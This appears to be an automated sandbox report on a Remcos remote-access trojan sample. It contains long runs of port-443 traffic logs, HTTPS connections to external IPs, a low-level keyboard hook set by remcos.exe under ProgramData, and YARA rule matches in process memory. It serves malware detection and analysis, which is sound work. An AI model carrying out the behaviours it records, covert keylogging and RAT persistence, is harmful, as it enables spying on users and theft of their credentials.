Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49781
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49780
Source: unknown	Network traffic detected: HTTP traffic on port 49968 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49785 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50026 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49807 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49980 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49779
Source: unknown	Network traffic detected: HTTP traffic on port 49885 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49778
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49899
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49777
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49898
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49776
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49897
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49775
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49896
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49774
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49895
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49773
Source: unknown	Network traffic detected: HTTP traffic on port 49862 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49894
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49772
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49771
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49892
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49770
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49891
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49890
Source: unknown	Network traffic detected: HTTP traffic on port 49897 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49911 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49830 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49991 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49769
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49768
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49889
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49767
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49888
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49766
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49765
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49886
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49764
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49885
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49763
Source: unknown	Network traffic detected: HTTP traffic on port 49863 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49884
Source: unknown	Network traffic detected: HTTP traffic on port 50038 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49883
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49881
Source: unknown	Network traffic detected: HTTP traffic on port 49840 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49896 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49770 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49797 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49956 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50005 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50083 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49879
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49878
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49999
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49756
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49877
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49998
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49997
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49996
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49753
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49874
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49995
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49752
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49873
Source: unknown	Network traffic detected: HTTP traffic on port 49923 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49994
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49872
Source: unknown	Network traffic detected: HTTP traffic on port 49818 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49871
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49992
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49870
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49991
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49990
Source: unknown	Network traffic detected: HTTP traffic on port 49786 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49874 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49747 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49829 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50072 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49934 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50027 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49749
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49747
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49989
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49867
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49988
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49745
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49866
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49987
Source: unknown	Network traffic detected: HTTP traffic on port 50013 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50059 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49769 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49803 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50071 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49826 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49906 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49849 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49900 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49837 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49975 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50060 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49929 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49872 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50025 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49798 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49861 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49999 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49918 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49873 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49787 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50001 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49986 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49850 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49963 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50007
Source: unknown	Network traffic detected: HTTP traffic on port 50037 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49798
Source: unknown	Network traffic detected: HTTP traffic on port 49734 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50006
Source: unknown	Network traffic detected: HTTP traffic on port 50012 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49797
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50009
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49796
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50008
Source: unknown	Network traffic detected: HTTP traffic on port 49952 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49795
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49794
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49793
Source: unknown	Network traffic detected: HTTP traffic on port 49814 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49792
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49791
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49790
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50001
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50000
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50003
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50002
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50005
Source: unknown	Network traffic detected: HTTP traffic on port 49895 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49768 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49825 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49884 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49907 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49941 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50082 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49789
Source: unknown	Network traffic detected: HTTP traffic on port 49997 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49779 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49859 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49871 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49894 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50003 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49965 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49942 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49977 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49816 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50035 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49954 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50014 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49788 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49988 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49767 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49827 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50046 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49848 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49756 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49838 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49976 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49953 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50047 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49908 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50024 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49883 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49860 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49778 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49998 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49931 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50058 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49804 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50002 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49987 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49920 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49926 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49949 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50054
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50053
Source: unknown	Network traffic detected: HTTP traffic on port 49800 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49789 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50055
Source: unknown	Network traffic detected: HTTP traffic on port 49766 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50058
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50057
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50059
Source: unknown	Network traffic detected: HTTP traffic on port 49961 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49984 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50022 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50061
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50060
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50063
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50062
Source: unknown	Network traffic detected: HTTP traffic on port 50068 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50045 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49881 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49675 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49996 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50010 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49812 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49858 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50064
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50067
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50066
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50068
Source: unknown	Network traffic detected: HTTP traffic on port 49915 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50072
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50071
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50074
Source: unknown	Network traffic detected: HTTP traffic on port 49823 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50073
Source: unknown	Network traffic detected: HTTP traffic on port 49777 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50080 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49790 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50009 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49972 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50076
Source: unknown	Network traffic detected: HTTP traffic on port 49834 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50075
Source: unknown	Network traffic detected: HTTP traffic on port 50057 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50078
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50077
Source: unknown	Network traffic detected: HTTP traffic on port 49892 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50079
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50080
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50083
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50082
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50085
Source: unknown	Network traffic detected: HTTP traffic on port 49847 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49927 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49822 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50087
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50086
Source: unknown	Network traffic detected: HTTP traffic on port 49870 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50089
Source: unknown	Network traffic detected: HTTP traffic on port 49765 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50079 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49938 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49811 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50018
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50017
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50019
Source: unknown	Network traffic detected: HTTP traffic on port 49813 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49974 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50032 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50010
Source: unknown	Network traffic detected: HTTP traffic on port 49916 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49836 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50012
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50011
Source: unknown	Network traffic detected: HTTP traffic on port 50055 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50014
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50013
Source: unknown	Network traffic detected: HTTP traffic on port 50078 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49939 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49776 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49791 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49753 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50029
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50028
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50021
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50020
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50022
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50025
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50024
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50027
Source: unknown	Network traffic detected: HTTP traffic on port 49780 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49879 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50026
Source: unknown	Network traffic detected: HTTP traffic on port 49985 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50000 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49802 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50021 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50030
Source: unknown	Network traffic detected: HTTP traffic on port 50067 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50039
Source: unknown	Network traffic detected: HTTP traffic on port 49995 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50011 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49928 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50032
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50031
Source: unknown	Network traffic detected: HTTP traffic on port 49857 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50033
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50035
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50038
Source: unknown	Network traffic detected: HTTP traffic on port 49764 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50037
Source: unknown	Network traffic detected: HTTP traffic on port 49801 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49940 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49824 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50041
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50040
Source: unknown	Network traffic detected: HTTP traffic on port 50066 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50089 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49891 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50033 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50043
Source: unknown	Network traffic detected: HTTP traffic on port 49835 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49917 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50042
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50045
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50044
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50047
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50046
Source: unknown	Network traffic detected: HTTP traffic on port 49962 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50052
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50051
Source: unknown	Network traffic detected: HTTP traffic on port 49775 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50044 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49846 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49792 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49890 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49970 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50042 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50007 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49781 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49878 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49935 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49958 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49889 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49866 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49820 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49946 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50018 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50077 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49763 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49855 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50053 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49981 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49752 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49901 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49924 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49819 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49844 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49947 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50076 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49793 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49831 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50031 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49992 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50043 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49774 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49782 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49969 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49994 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50020 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50054 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49856 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49913 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49808 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50006 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49867 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49865 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49942
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49820
Source: unknown	Network traffic detected: HTTP traffic on port 49842 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49941
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49940
Source: unknown	Network traffic detected: HTTP traffic on port 50075 -> 443

Source: unknown	HTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.4:49749 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.4:49752 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.12.23.50:443 -> 192.168.2.4:49756 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.12.23.50:443 -> 192.168.2.4:49763 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.4:49764 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.5.155:443 -> 192.168.2.4:49906 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.5.155:443 -> 192.168.2.4:49916 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.5.155:443 -> 192.168.2.4:49931 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.5.155:443 -> 192.168.2.4:49944 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.5.155:443 -> 192.168.2.4:49963 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.5.155:443 -> 192.168.2.4:49986 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.5.155:443 -> 192.168.2.4:49992 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.5.155:443 -> 192.168.2.4:50002 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.5.155:443 -> 192.168.2.4:50003 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.5.155:443 -> 192.168.2.4:50009 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.5.155:443 -> 192.168.2.4:50022 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.5.155:443 -> 192.168.2.4:50035 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.5.155:443 -> 192.168.2.4:50042 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.5.155:443 -> 192.168.2.4:50051 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.5.155:443 -> 192.168.2.4:50062 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.5.155:443 -> 192.168.2.4:50080 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Installs a global keyboard hook

Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Windows user hook set: 7188 call wnd proc C:\Windows\System32\shcore.dll			Jump to behavior
Source: C:\ProgramData\Remcos\remcos.exe	Windows user hook set: 0 keyboard low level C:\ProgramData\Remcos\remcos.exe

E-Banking Fraud

Yara detected Remcos RAT

Source: Yara match	File source: 00000022.00000003.2918030164.0000000004800000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2469760286.0000000000A0E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.2926361931.0000000000C94000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000002.2625408884.0000000000988000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000003.2584176441.0000000004800000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.2922707020.0000000000401000.00000040.00000001.01000000.00000011.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2460202180.0000000000401000.00000040.00000001.01000000.00000010.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000003.2453130282.0000000004800000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000002.2624639013.0000000000401000.00000040.00000001.01000000.00000011.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.2934103657.0000000004C2F000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000003.2419805478.0000000004800000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: remcos_a.exe PID: 7184, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: remcos.exe PID: 7280, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: remcos.exe PID: 7640, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: remcos.exe PID: 180, type: MEMORYSTR
Source: Yara match	File source: C:\ProgramData\Remcos\logs.dat, type: DROPPED

System Summary

Malicious sample detected (through community Yara rule)

Source: 00000022.00000003.2918030164.0000000004800000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 0000001B.00000003.2584176441.0000000004800000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 0000000D.00000002.2922707020.0000000000401000.00000040.00000001.01000000.00000011.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 0000000C.00000002.2460202180.0000000000401000.00000040.00000001.01000000.00000010.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 0000000D.00000003.2453130282.0000000004800000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 0000001B.00000002.2624639013.0000000000401000.00000040.00000001.01000000.00000011.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
